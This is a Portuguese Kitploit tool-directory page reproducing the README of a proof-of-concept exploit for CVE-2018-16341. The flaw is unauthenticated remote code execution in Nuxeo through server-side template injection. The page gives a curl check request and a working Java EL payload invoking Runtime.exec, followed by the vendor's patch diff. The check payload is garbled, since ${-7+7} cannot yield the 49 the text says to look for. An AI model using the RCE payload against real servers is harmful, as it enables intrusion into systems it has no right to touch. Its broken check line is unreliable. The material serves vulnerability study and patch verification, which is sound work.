Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-16341 — CVE-2018-16341 - Execução Remota de Código no Nuxeo sem autenticação usando Injeção de Template no Lado do Servidor | Kitploit
Ferramentas/GitHubGitHub/mpgn/cve-2018-16341
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - Execução Remota de Código no Nuxeo sem autenticação usando Injeção de Template no Lado do Servidor

Ver Repositório
2412há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-16341

Bypass de Autenticação e Execução Remota de Código no Nuxeo < 10.3 usando um SSTI - CVE-2018-16341

image

Análise detalhada (não em inglês):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

Advisory de Segurança:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

Nota: A versão 9.x do Nuxeo não é mais suportada pela Nuxeo, mas um hotfix foi fornecido para a versão 9.x. Do meu lado, a versão 9.10 estava vulnerável.


A vulnerabilidade

Este PoC explora uma Injeção de Template no Lado do Servidor (SSTI) para alcançar a RCE localizada no arquivo NuxeoUnknownResource.java

  • Para verificar se o Nuxeo está vulnerável, basta enviar este payload e verificar o número 49:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • Obtenha a RCE usando este payload:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

Correção

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
Baixar ferramenta